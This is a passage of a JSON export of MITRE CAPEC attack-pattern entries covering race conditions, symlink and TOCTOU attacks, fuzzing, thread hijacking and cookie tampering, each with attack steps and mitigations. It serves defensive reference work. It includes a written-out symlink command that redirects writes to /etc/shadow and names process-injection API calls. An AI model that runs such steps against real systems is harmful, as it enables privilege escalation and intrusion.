finish."},{"Step":"3","Phase":"Explore","Description":"If the target program has a deadlock condition, the program waits indefinitely resulting in a denial of service."}]},"Prerequisites":{"Prerequisite":["The target host has a deadlock condition. There are four conditions for a deadlock to occur, known as the Coffman conditions. [REF-101]","The target host exposes an API to the user."]},"Skills_Required":{"Skill":["This type of attack may be sophisticated and require knowledge about the system\'s resources and APIs.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"A successful forced deadlock attack compromises the availability of the system by exhausting its available resources."}},"Mitigations":{"Mitigation":["Use known algorithm to avoid deadlock condition (for instance non-blocking synchronization algorithms).","For competing actions, use well-known libraries which implement synchronization."]},"Example_Instances":{"Example":"An example of a deadlock which may occur in database products is the following. Client applications using the database may require exclusive access to a table, and in order to gain exclusive access they ask for a lock. If one client application holds a lock on a table and attempts to obtain the lock on a second table that is already held by a second client application, this may lead to deadlock if the second application then attempts to obtain the lock that is held by the first application (Source: Wikipedia, http://en.wikipedia.org/wiki/Deadlock)"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"412"},{"CWE_ID":"567"},{"CWE_ID":"662"},{"CWE_ID":"667"},{"CWE_ID":"833"},{"CWE_ID":"1322"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-101","Section":"Deadlock"},{"External_Reference_ID":"REF-609","Section":"Testing for XML Injection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns, Type (Relationship -> Attack_Pattern)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Phases, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Probing_Techniques, Related_Weaknesses, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"26":{"ID":"26","Name":"Leveraging Race Conditions","Abstraction":"Meta","Status":"Stable","Description":"The adversary targets a race condition occurring when multiple processes access and manipulate the same resource concurrently, and the outcome of the execution depends on the particular order in which the access takes place. The adversary can leverage a race condition by \\"running the race\\", modifying the resource and modifying the normal execution flow. For instance, a race condition can occur while accessing a file: the adversary can trick the system by replacing the original file with their version and cause the system to read the malicious file.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary explores to gauge what level of access they have."},{"Step":"2","Phase":"Experiment","Description":"The adversary gains access to a resource on the target host. The adversary modifies the targeted resource. The resource\'s value is used to determine the next normal execution action."},{"Step":"3","Phase":"Exploit","Description":"The resource is modified/checked concurrently by multiple processes. By using one of the processes, the adversary is able to modify the value just before it is consumed by a different process. A race condition occurs and is exploited by the adversary to abuse the target host."}]},"Prerequisites":{"Prerequisite":["A resource is accessed/modified concurrently by multiple processes such that a race condition exists.","The adversary has the ability to modify the resource."]},"Skills_Required":{"Skill":["Being able to \\"run the race\\" requires basic knowledge of concurrent processing including synchonization techniques.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use safe libraries to access resources such as files.","Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.","Use synchronization to control the flow of execution.","Use static analysis tools to find race conditions.","Pay attention to concurrency problems related to the access of resources."]},"Example_Instances":{"Example":["The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. See also: CVE-2007-1057",{"p":"The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name (see [REF-107]).","div":["include <sys/types.h>",{"style":"margin-left:10px;","class":"informative","div":["int fd;",{"style":"margin-left:10px;","div":["return;",{"style":"margin-left:10px;"}]},"char *userstr;",{"style":"margin-left:10px;","div":["userstr = argv[1];",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"368"},{"CWE_ID":"363"},{"CWE_ID":"366"},{"CWE_ID":"370"},{"CWE_ID":"362"},{"CWE_ID":"662"},{"CWE_ID":"689"},{"CWE_ID":"667"},{"CWE_ID":"665"},{"CWE_ID":"1223"},{"CWE_ID":"1254"},{"CWE_ID":"1298"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-105","Section":"Race condition"},{"External_Reference_ID":"REF-106"},{"External_Reference_ID":"REF-107","Section":"Test Case ID 1598"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns, Type (Relationship -> Attack_Pattern)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, References, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"27":{"ID":"27","Name":"Leveraging Race Conditions via Symbolic Links","Abstraction":"Detailed","Status":"Draft","Description":"This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers\' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"29"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Verify that target host\'s platform supports symbolic links.] This attack pattern is only applicable on platforms that support symbolic links.","Technique":["Research target platform to determine whether it supports symbolic links.","Create a symbolic link and ensure that it works as expected on the given platform."]},{"Step":"2","Phase":"Explore","Description":"[Examine application\'s file I/O behavior] Analyze the application\'s file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files.","Technique":["Use kernel tracing utility such as ktrace to monitor application behavior.","Use debugging utility such as File Monitor to monitor the application\'s filesystem I/O calls","Watch temporary directories to see when temporary files are created, modified and deleted.","Analyze source code for open-source systems like Linux, Apache, etc."]},{"Step":"3","Phase":"Experiment","Description":"[Verify ability to write to filesystem] The attacker verifies ability to write to the target host\'s file system.","Technique":["Create a file that does not exist in the target directory (e.g. \\"touch temp.txt\\" in UNIX-like systems)","On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it.","Verify permissions on target directory"]},{"Step":"4","Phase":"Exploit","Description":"[Replace file with a symlink to a sensitive system file.] Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file.","Technique":["Create an infinite loop containing commands such as \\"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\\". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) \\"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\\", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead.","Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it."]}]},"Prerequisites":{"Prerequisite":["The attacker is able to create Symlink links on the target host.","Tainted data from the attacker is used and copied to temporary files.","The target host does insecure temporary file creation."]},"Skills_Required":{"Skill":["This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them).",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Use safe libraries when creating temporary files. For instance the standard library function mkstemp can be used to safely create temporary files. For shell scripts, the system utility mktemp does the same thing.","Access to the directories should be restricted as to prevent attackers from manipulating the files. Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file.","Follow the principle of least privilege when assigning access rights to files.","Ensure good compartmentalization in the system to provide protected areas that can be trusted."]},"Example_Instances":{"Example":[{"p":["In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For \\"efficiency,\\" it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.","The directory /tmp is world-writable. The malicious user creates a symbolic link to the file /.rhosts named /tmp/foo. Then, they invokes foo with \\"user\\" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. \\"user password\\")) in it. It removes the temporary file (merely removing the symbolic link).","Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.","[REF-115]"]},"GNU \\"ed\\" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. See also: CVE-2006-6939","OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894","Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"367"},{"CWE_ID":"61"},{"CWE_ID":"662"},{"CWE_ID":"689"},{"CWE_ID":"667"}]},"References":{"Reference":[{"External_Reference_ID":"REF-115","Section":"Symlink race"},{"External_Reference_ID":"REF-116"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"}]}},"28":{"ID":"28","Name":"Fuzzing","Abstraction":"Meta","Status":"Draft","Description":"In this attack pattern, the adversary leverages fuzzing to try to identify weaknesses in the system. Fuzzing is a software security and functionality testing method that feeds randomly constructed input to the system and looks for an indication that a failure in response to that input has occurred. Fuzzing treats the system as a black box and is totally free from any preconceptions or assumptions about the system. Fuzzing can help an attacker discover certain assumptions made about user input in the system. Fuzzing gives an attacker a quick way of potentially uncovering some of these assumptions despite not necessarily knowing anything about the internals of the system. These assumptions can then be turned against the system by specially crafting user input that may allow an attacker to achieve their goals.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Observe communication and inputs] The fuzzing attacker observes the target system looking for inputs and communications between modules, subsystems, or systems.","Technique":["Network sniffing. Using a network sniffer such as wireshark, the attacker observes communications into and out of the target system.","Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the attacker observes the system calls and API calls that are made by the target system, and the nature of their parameters.","Observe inputs using web inspection tools (OWASP\'s WebScarab, Paros, TamperData, TamperIE, etc.)"]},{"Step":"2","Phase":"Experiment","Description":"[Generate fuzzed inputs] Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.","Technique":["Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).","Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system."]},{"Step":"3","Phase":"Experiment","Description":"[Observe the outcome] Observe the outputs to the inputs fed into the system by fuzzers and see if anything interesting happens. If failure occurs, determine why that happened. Figure out the underlying assumption that was invalidated by the input."},{"Step":"4","Phase":"Exploit","Description":"[Craft exploit payloads] Put specially crafted input into the system that leverages the weakness identified through fuzzing and allows to achieve the goals of the attacker. Fuzzers often reveal ways to slip through the input validation filters and introduce unwanted data into the system.","Technique":["Identify and embed shell code for the target system.","Embed higher level attack commands in the payload. (e.g., SQL, PHP, server-side includes, etc.)","Induce denial of service by exploiting resource leaks or bad error handling."]}]},"Skills_Required":{"Skill":["There is a wide variety of fuzzing tools available.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Fuzzing tools."},"Indicators":{"Indicator":"A lot of invalid data is fed to the system. Data that cannot have been generated through a legitimate transaction/request. Data is coming into the system within a short period of time and potentially from the same IP."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Alter Execution Logic"}]},"Mitigations":{"Mitigation":["Test to ensure that the software behaves as per specification and that there are no unintended side effects. Ensure that no assumptions about the validity of data are made.","Use fuzz testing during the software QA process to uncover any surprises, uncover any assumptions or unexpected behavior."]},"Example_Instances":{"Example":"A fuzz test reveals that when data length for a particular field exceeds certain length, the input validation filter fails and lets the user data in unfiltered. This provides an attacker with an injection vector to deliver the malicious payload into the system."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"20"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"29":{"ID":"29","Name":"Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions","Abstraction":"Standard","Status":"Draft","Description":"This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by \\"running the race\\", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"26","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary explores to gauge what level of access they have."},{"Step":"2","Phase":"Experiment","Description":"The adversary confirms access to a resource on the target host. The adversary confirms ability to modify the targeted resource."},{"Step":"3","Phase":"Exploit","Description":"The adversary decides to leverage the race condition by \\"running the race\\", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary can replace the resource and cause an escalation of privilege."}]},"Prerequisites":{"Prerequisite":["A resource is access/modified concurrently by multiple processes.","The adversary is able to modify resource.","A race condition exists while accessing a resource."]},"Skills_Required":{"Skill":["This attack can get sophisticated since the attack has to occur within a short interval of time.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Alter Execution Logic"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Use safe libraries to access resources such as files.","Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.","Use synchronization to control the flow of execution.","Use static analysis tools to find race conditions.","Pay attention to concurrency problems related to the access of resources."]},"Example_Instances":{"Example":["The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. See also: CVE-2007-1057",{"p":["The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an adversary can replace the file referenced by the name.","[REF-107]"],"div":["include <sys/types.h>",{"style":"margin-left:10px;","class":"bad","div":["int fd;",{"style":"margin-left:10px;","div":["return;",{"style":"margin-left:10px;"}]},"char *userstr;",{"style":"margin-left:10px;","div":["userstr = argv[1];",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"367"},{"CWE_ID":"368"},{"CWE_ID":"366"},{"CWE_ID":"370"},{"CWE_ID":"362"},{"CWE_ID":"662"},{"CWE_ID":"691"},{"CWE_ID":"663"},{"CWE_ID":"665"}]},"References":{"Reference":[{"External_Reference_ID":"REF-131"},{"External_Reference_ID":"REF-107","Section":"Test Case ID 1598"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Related_Attack_Patterns"}]}},"30":{"ID":"30","Name":"Hijacking a Privileged Thread of Execution","Abstraction":"Standard","Status":"Draft","Description":"An adversary hijacks a privileged thread of execution by injecting malicious code into a running process. By using a privleged thread to do their bidding, adversaries can evade process-based detection that would stop an attack that creates a new process. This can lead to an adversary gaining access to the process\'s memory and can also enable elevated privileges. The most common way to perform this attack is by suspending an existing thread and manipulating its memory.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"233","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target thread] The adversary determines the underlying system thread that is subject to user-control"},{"Step":"2","Phase":"Experiment","Description":"[Gain handle to thread] The adversary then gains a handle to a process thread.","Technique":["Use the \\"OpenThread\\" API call in Windows on a known thread.","Cause an exception in a java privileged block public function and catch it, or catch a normal signal. The thread is then hanging and the adversary can attempt to gain a handle to it."]},{"Step":"3","Phase":"Experiment","Description":"[Alter process memory] Once the adversary has a handle to the target thread, they will suspend the thread and alter the memory using native OS calls.","Technique":"On Windows, use \\"SuspendThread\\" followed by \\"VirtualAllocEx\\", \\"WriteProcessMemory\\", and \\"SetThreadContext\\"."},{"Step":"4","Phase":"Exploit","Description":"[Resume thread execution] Once the process memory has been altered to execute malicious code, the thread is then resumed.","Technique":"On Windows, use \\"ResumeThread\\"."}]},"Prerequisites":{"Prerequisite":["The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users","In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or calling native OS calls that can suspend and alter process memory. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute."]},"Skills_Required":{"Skill":["Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread.",{"Level":"High"}]},"Resources_Required":{"Resource":{"p":["None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.","The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary\'s malicious code. This is the case even if the adversary conducts the attack remotely."]}},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code.","Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope."]},"Example_Instances":{"Example":"Adversary targets an application written using Java\'s AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"270"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1055.003","Entry_Name":"Process Injection:Thread Execution Hijacking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Probing_Techniques, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, Probing_Techniques"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Prerequisites"}]}},"31":{"ID":"31","Name":"Accessing/Intercepting/Modifying HTTP Cookies","Abstraction":"Detailed","Status":"Draft","Description":"This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. There are several different forms of this attack. The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein. The second form involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the adversary to impersonate the remote user/session. The third form is when the cookie\'s content is modified by the adversary before it is sent back to the server. Here the adversary seeks to convince the target server to operate on this falsified information.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"39"},{"Nature":"ChildOf","CAPEC_ID":"157","Exclude_Related":{"Exclude_ID":"513"}}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain copy of cookie] The adversary first needs to obtain a copy of the cookie. The adversary may be a legitimate end user wanting to escalate privilege, or could be somebody sniffing on a network to get a copy of HTTP cookies.","Technique":["Sniff cookie using a network sniffer such as Wireshark","Obtain cookie using a utility such as the Firefox Cookie Manager, Chrome DevTools or AnEC Cookie Editor.","Steal cookie via a cross-site scripting attack.","Guess cookie contents if it contains predictable information."]},{"Step":"2","Phase":"Experiment","Description":"[Obtain sensitive information from cookie] The adversary may be able to get sensitive information from the cookie. The web application developers may have assumed that cookies are not accessible by end users, and thus, may have put potentially sensitive information in them.","Technique":["If cookie shows any signs of being encoded using a standard scheme such as base64, decode it.","Analyze the cookie\'s contents to determine whether it contains any sensitive information."]},{"Step":"3","Phase":"Experiment","Description":"[Modify cookie to subvert security controls.] The adversary may be able to modify or replace cookies to bypass security controls in the application.","Technique":["Modify logical parts of cookie and send it back to server to observe the effects.","Modify numeric parts of cookie arithmetically and send it back to server to observe the effects.","Modify cookie bitwise and send it back to server to observe the effects.","Replace cookie with an older legitimate cookie and send it back to server to observe the effects. This technique would be helpful in cases where the cookie contains a \\"points balance\\" for a given user where the points have some value. The user may spend their points and then replace their cookie with an older one to restore their balance."]}]},"Prerequisites":{"Prerequisite":["Target server software must be a HTTP daemon that relies on cookies.","The cookies must contain sensitive information.","The adversary must be able to make HTTP requests to the server, and the cookie must be contained in the reply."]},"Skills_Required":{"Skill":["To overwrite session cookie data, and submit targeted attacks via HTTP",{"Level":"Low"},"Exploiting a remote buffer overflow generated by attack",{"Level":"High"}]},"Resources_Required":{"Resource":"A utility that allows for the viewing and modification of cookies. Many modern web browsers support this behavior."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Use input validation for cookies","Design: Generate and validate MAC for cookies","Implementation: Use SSL/TLS to protect cookie in transit","Implementation: Ensure the web server implements all relevant security patches, many exploitable buffer overflows are fixed in patches issued for the software."]},"Example_Instances":{"Example":"There are two main attack vectors for exploiting poorly protected session variables like cookies. One is the local machine itself which can be exploited directly at the physical level or indirectly through XSS and phishing. In addition, the adversary in the middle attack (CAPEC-94) relies on a network sniffer, proxy, or other intermediary to intercept the subject\'s credentials and use them to impersonate the digital subject on the host. The issue is that once the credentials are intercepted, impersonation is trivial for the adversary to accomplish if no other protection mechanisms are in place. See also: CVE-2010-5148 , CVE-2016-0353"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"565"},{"CWE_ID":"302"},{"CWE_ID":"311"},{"CWE_ID":"113"},{"CWE_ID":"539"},{"CWE_ID":"20"},{"CWE_ID":"315"},{"CWE_ID":"384"},{"CWE_ID":"472"},{"CWE_ID":"602"},{"CWE_ID":"642"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances, Related_Weaknesses"}]}},"32":{"ID":"32","Name":"XSS Through HTTP Query Strings","Abstraction":"Detailed","Status":"Draft","Description":"An adversary embeds malicious script code in the parameters of an HTTP query string and convinces a victim to submit the HTTP request that contains the query string to a vulnerable web application. The web application then procedes to use the values parameters without properly validation them first and generates the HTML code that will be executed 